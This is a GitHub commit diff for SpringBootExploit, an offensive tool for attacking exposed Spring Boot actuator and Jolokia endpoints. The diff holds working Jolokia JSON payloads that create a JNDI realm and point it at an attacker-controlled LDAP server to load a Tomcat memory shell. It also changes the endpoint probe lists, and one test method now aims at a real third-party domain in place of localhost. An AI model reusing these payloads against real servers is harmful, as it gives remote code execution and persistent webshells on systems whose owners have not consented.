Skip to content
This repository was archived by the owner on Jul 25, 2024. It is now read-only.

Commit 34c3a82

Browse files
SummerSecSummerSec
committed
r
1 parent 5c8ce5f commit 34c3a82

File tree

9 files changed

+183
-145
lines changed

9 files changed

+183
-145
lines changed

README.md

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,6 @@
11
<h1 align="center" >SpringBootExploit</h1>
22
<h3 align="center" >一款针对SpringBootEnv页面进行快速漏洞利用</h3>
33
<p align="center">
4-
<a href="https://github.com/0x727/SpringBootExploit"></a>
54
<a href="https://github.com/0x727/SpringBootExploit"><img alt="SpringBootExploit" src="https://img.shields.io/badge/Spring-Boot-Exploit-green"></a>
65
<a href="https://github.com/0x727/SpringBootExploit"><img alt="Forks" src="https://img.shields.io/github/forks/0x727/SpringBootExploit"></a>
76
<a href="https://github.com/0x727/SpringBootExploit"><img alt="Release" src="https://img.shields.io/github/release/0x727/SpringBootExploit.svg"></a>

pom.xml

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -7,7 +7,7 @@
77
<groupId>org.example</groupId>
88
<artifactId>SpringBootExploit</artifactId>
99
<!-- <packaging>jar</packaging>-->
10-
<version>1.1-SNAPSHOT</version>
10+
<version>1.2-SNAPSHOT</version>
1111

1212

1313
<!-- <properties>-->
@@ -21,8 +21,8 @@
2121
<groupId>org.apache.maven.plugins</groupId>
2222
<artifactId>maven-compiler-plugin</artifactId>
2323
<configuration>
24-
<source>8</source>
25-
<target>8</target>
24+
<source>7</source>
25+
<target>7</target>
2626
<encoding>UTF-8</encoding>
2727
<compilerArguments>
2828
<bootclasspath>D:/java/jre/lib/rt.jar;D:/java/jre/lib/jce.jar</bootclasspath>

src/main/java/com/drops/exp/JolokiaRealmRCEEXP.java

Lines changed: 7 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -17,25 +17,26 @@ public boolean hasJolokiaRealmRCE(String target, String vps, String port, boole
1717

1818

1919

20-
String create_realm = " {\n" +
20+
String create_realm = "{\n" +
2121
" \"mbean\": \"Tomcat:type=MBeanFactory\",\n" +
2222
" \"type\": \"EXEC\",\n" +
2323
" \"operation\": \"createJNDIRealm\",\n" +
2424
" \"arguments\": [\"Tomcat:type=Engine\"]\n" +
2525
"}";
2626

27-
String wirte_factory = " {\n" +
27+
String wirte_factory = "{\n" +
2828
" \"mbean\": \"Tomcat:realmPath=/realm0,type=Realm\",\n" +
2929
" \"type\": \"WRITE\",\n" +
3030
" \"attribute\": \"contextFactory\",\n" +
31-
" \"value\": \"com.sun.jndi.rmi.registry.RegistryContextFactory\"\n" +
31+
// " \"value\": \"com.sun.jndi.rmi.registry.RegistryContextFactory\"\n" +
32+
" \"value\": \"com.sun.jndi.ldap.LdapCtxFactory\"\n" +
3233
"}";
3334
// 设置 http
3435
String write_url = "{\n" +
3536
" \"mbean\": \"Tomcat:realmPath=/realm0,type=Realm\",\n" +
3637
" \"type\": \"WRITE\",\n" +
3738
" \"attribute\": \"connectionURL\",\n" +
38-
" \"value\": \"rmi://" + vps + ":10990/BehinderFilter\"\n" +
39+
" \"value\": \"ldap://" + vps + ":1389/basic/TomcatMemshell3\"\n" +
3940
"}";
4041

4142
String stop = "{\n" +
@@ -59,7 +60,7 @@ public boolean hasJolokiaRealmRCE(String target, String vps, String port, boole
5960
if (JolokiaUtil.hasMbeansV3(target)){
6061
for (String p: poc){
6162
if (
62-
HTTPUtils.postRequestV1(target, "/jolokia",p).getStatus() != 200
63+
HTTPUtils.postRequestjson(target, "jolokia",p).getStatus() != 200
6364
){
6465
return false;
6566
}
@@ -70,7 +71,7 @@ public boolean hasJolokiaRealmRCE(String target, String vps, String port, boole
7071
if (JolokiaUtil.hasMbeansV4(target)){
7172
for (String p: poc){
7273
if (
73-
HTTPUtils.postRequestV1(target, "/actuator/jolokia",p).getStatus() != 200
74+
HTTPUtils.postRequestjson(target, "actuator/jolokia",p).getStatus() != 200
7475
) {
7576
return false;
7677
}

src/main/java/com/drops/poc/JolokiaLogbackRCEPOC.java

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -27,11 +27,11 @@ public JolokiaLogbackRCEPOC() {
2727
}
2828

2929
public boolean hasJolokiaLogbackRCE(String target){
30-
String regex = "jolokia-core";
31-
String context = HTTPUtils.getRequest(target).body();
30+
// String regex = "jolokia-core";
31+
// String context = HTTPUtils.getRequest(target).body();
3232
// this.mainController.logTextArea.appendText(Utils.log("正在验证是否存在依赖jolokia-core"));
33-
if (context.contains(regex)){
34-
this.mainController.logTextArea.appendText(Utils.log("存在依赖jolokia-core"));
33+
if (true){
34+
// this.mainController.logTextArea.appendText(Utils.log("存在依赖jolokia-core"));
3535
String url = URLUtil.getROOT(target) + "jolokia/list";
3636
String url2 = URLUtil.getROOT(target) + "actuator/jolokia/list";
3737
HttpResponse re = HTTPUtils.getRequest(url);
@@ -57,6 +57,6 @@ public boolean hasJolokiaLogbackRCE(String target){
5757

5858
public static void main(String[] args) {
5959
JolokiaRealmJNDIRCEPOC poc = new JolokiaRealmJNDIRCEPOC();
60-
poc.hasJolokiaRealmJNDIRCE("http://127.0.0.1:9095/env");
60+
poc.hasJolokiaRealmJNDIRCE("https://developer.segwayrobotics.com");
6161
}
6262
}

src/main/java/com/drops/poc/JolokiaRealmJNDIRCEPOC.java

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -26,11 +26,11 @@ public JolokiaRealmJNDIRCEPOC() {
2626

2727

2828
public boolean hasJolokiaRealmJNDIRCE(String target){
29-
String regex = "jolokia-core";
30-
String context = HTTPUtils.getRequest(target).body();
29+
// String regex = "jolokia-core";
30+
// String context = HTTPUtils.getRequest(target).body();
3131
// this.mainController.logTextArea.appendText(Utils.log("正在验证是否存在依赖jolokia-core"));
32-
if (context.contains(regex)){
33-
this.mainController.logTextArea.appendText(Utils.log("存在依赖jolokia-core"));
32+
if (true){
33+
// this.mainController.logTextArea.appendText(Utils.log("存在依赖jolokia-core"));
3434
String url = URLUtil.getROOT(target) + "jolokia/list";
3535
String url2 = URLUtil.getROOT(target) + "actuator/jolokia/list";
3636
HttpResponse re = HTTPUtils.getRequest(url);

src/main/java/com/drops/poc/SpringBootInfo.java

Lines changed: 15 additions & 15 deletions
Original file line numberDiff line numberDiff line change
@@ -46,22 +46,22 @@ public SpringBootInfo(){
4646
this.mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName());
4747
this.infoCheck = new SpringBootInfoCheck();
4848

49-
pointListV1.add("autoconfig");
49+
// pointListV1.add("autoconfig");
5050
// pointListV1.add("heapdump");
51-
pointListV1.add("dump");
52-
pointListV1.add("mappings");
51+
// pointListV1.add("dump");
52+
// pointListV1.add("mappings");
5353
pointListV1.add("auditevents");
5454
pointListV1.add("beans");
55-
pointListV1.add("health");
55+
// pointListV1.add("health");
5656
pointListV1.add("configprops");
5757
pointListV1.add("info");
5858
pointListV1.add("loggers");
59-
pointListV1.add("threaddump");
59+
// pointListV1.add("threaddump");
6060
pointListV1.add("metrics");
6161
pointListV1.add("trace");
6262
pointListV1.add("env/spring.jmx.enabled");
6363
pointListV1.add("refresh");
64-
pointListV1.add("trace");
64+
// pointListV1.add("trace");
6565
pointListV1.add("jolokia");
6666
pointListV1.add("env");
6767
pointListV1.add("restart");
@@ -73,16 +73,16 @@ public SpringBootInfo(){
7373
pointListV2.add("actuator/restart");
7474
pointListV2.add("actuator/refresh");
7575
pointListV2.add("actuator/beans");
76-
pointListV2.add("actuator/health");
76+
// pointListV2.add("actuator/health");
7777
pointListV2.add("actuator/conditions");
7878
pointListV2.add("actuator/configprops");
7979
pointListV2.add("actuator/info");
8080
pointListV2.add("actuator/loggers");
81-
pointListV2.add("actuator/httptrace");
82-
pointListV2.add("actuator/threaddump");
81+
// pointListV2.add("actuator/httptrace");
82+
// pointListV2.add("actuator/threaddump");
8383
pointListV2.add("actuator/metrics");
84-
pointListV2.add("actuator/httptrace");
85-
pointListV2.add("actuator/mappings");
84+
// pointListV2.add("actuator/httptrace");
85+
// pointListV2.add("actuator/mappings");
8686
pointListV2.add("actuator/jolokia");
8787
pointListV2.add("actuator/jolokia/list");
8888
// pointListV2.add("actuator/hystrix.stream");
@@ -95,12 +95,12 @@ public SpringBootInfo(){
9595
pointListV2.add("monitor/env");
9696
pointListV2.add("monitor/info");
9797
pointListV2.add("monitor/loggers");
98-
pointListV2.add("monitor/heapdump");
99-
pointListV2.add("monitor/threaddump");
98+
// pointListV2.add("monitor/heapdump");
99+
// pointListV2.add("monitor/threaddump");
100100
pointListV2.add("monitor/metrics");
101101
pointListV2.add("monitor/scheduledtasks");
102-
pointListV2.add("monitor/httptrace");
103-
pointListV2.add("monitor/mappings");
102+
// pointListV2.add("monitor/httptrace");
103+
// pointListV2.add("monitor/mappings");
104104
pointListV2.add("monitor/jolokia");
105105
// pointListV2.add("monitor/hystrix.stream");
106106

src/main/java/com/drops/poc/SpringBootInfoCheck.java

Lines changed: 3 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -107,8 +107,9 @@ void checkEnvPointV1(String addr){
107107
if (!xstreamRCEPOC.hasEurekaXstreamRCE(url)){
108108
JolokiaLogbackRCEPOC logbackRCEPOC = new JolokiaLogbackRCEPOC();
109109
JolokiaRealmJNDIRCEPOC realmJNDIRCEPOC = new JolokiaRealmJNDIRCEPOC();
110-
if(!logbackRCEPOC.hasJolokiaLogbackRCE(url) || realmJNDIRCEPOC.hasJolokiaRealmJNDIRCE(url)){
111-
110+
logbackRCEPOC.hasJolokiaLogbackRCE(url);
111+
Boolean f = realmJNDIRCEPOC.hasJolokiaRealmJNDIRCE(url);
112+
if(!f){
112113
H2DatabaseConsoleJNDIRCEPOC h2 = new H2DatabaseConsoleJNDIRCEPOC();
113114
if (!h2.hasH2DatabaseConsoleJNDIRCE(url)){
114115

0 commit comments

Comments
 (0)